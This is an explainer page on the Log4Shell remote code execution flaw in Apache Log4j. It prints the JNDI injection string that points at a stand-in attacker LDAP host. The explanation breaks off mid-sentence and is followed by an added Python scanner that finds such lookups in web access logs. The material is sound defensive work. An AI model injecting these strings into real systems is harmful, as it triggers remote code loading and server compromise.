hacksheets
log4shell 0-day Exploit in log4j v2 - What it is? How to Identify and Mitigate the Vulnerability (CVE-2021-44228)
What is log4shell?
“Log4Shell” was named by researchers at LunaSec, and the vulnerability is credited to Chen Zhaojun of Alibaba. It is a remote code execution vulnerability in the Apache Log4j library, an open source logging utility written in Java and developed by the Apache Software Foundation. The library is used in millions of applications, websites and services, including iCloud, Minecraft, and Steam.
The issue was first discovered in Microsoft-owned Minecraft. LunaSec warns that “many, many services” are vulnerable to this exploit, since Log4j is present in almost all major Java-based enterprise applications and servers. It also warns that anybody using Apache Struts is “likely vulnerable.”
In affected log4j versions, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Check out the list of affected components/manufacturers -
github.com/YfryTchsGD/Log4jAttackSurface
How does the vulnerability work?
The attack vector is very easy for attackers to use. A single string of text can trigger an application to reach out to an external location, provided that the string is logged by a vulnerable instance of log4j.
An attacker might supply special text in an HTTP User-Agent header or a simple POST form request, with the usual form:
${jndi:ldap://attackercontrolledhost.com/resource}
…where
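To identify requests that carried this string, the following added example (not code from the original page) scans web access logs for the lookup form shown above in the request line, Referer and User-Agent fields. It assumes the combined access-log format; the log lines and client IPs are constructed samples, and only the plain form shown on this page (raw or percent-encoded) is matched.

```python
import re
from urllib.parse import unquote

# Matches the lookup form shown on this page: ${jndi:<scheme>://<host>...
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/\s}:]+)", re.IGNORECASE)

# Combined access-log format: ... "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

def find_jndi_lookups(line):
    """Return a list of (client_ip, field, scheme, host) for one log line."""
    m = LINE_RE.match(line)
    if not m:
        return []
    hits = []
    for field in ("request", "referer", "agent"):
        # Decode percent-encoding once so %24%7Bjndi... in a URL is also seen.
        value = unquote(m.group(field))
        for scheme, host in JNDI_RE.findall(value):
            hits.append((m.group("ip"), field, scheme.lower(), host.lower()))
    return hits

# Constructed sample lines (documentation IPs, host name taken from the page).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:09:14:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attackercontrolledhost.com/resource}"',
    '198.51.100.23 - - [10/Dec/2021:09:15:40 +0000] '
    '"GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fattackercontrolledhost.com%2Fa%7D HTTP/1.1" '
    '200 128 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Dec/2021:09:16:11 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Collect hits across all lines and the set of callback hosts to hunt for."""
    hits = [h for line in lines for h in find_jndi_lookups(line)]
    return hits, sorted({h[3] for h in hits})

if __name__ == "__main__":
    hits, hosts = scan(SAMPLE_LOG)
    for ip, field, scheme, host in hits:
        print(f"{ip} sent a {scheme} JNDI lookup for {host} in {field}")
    print("hosts to check in egress/DNS logs:", hosts)
```

A hit shows only that the string was received; whether the application then connected to the extracted host has to be confirmed from outbound connection or DNS logs.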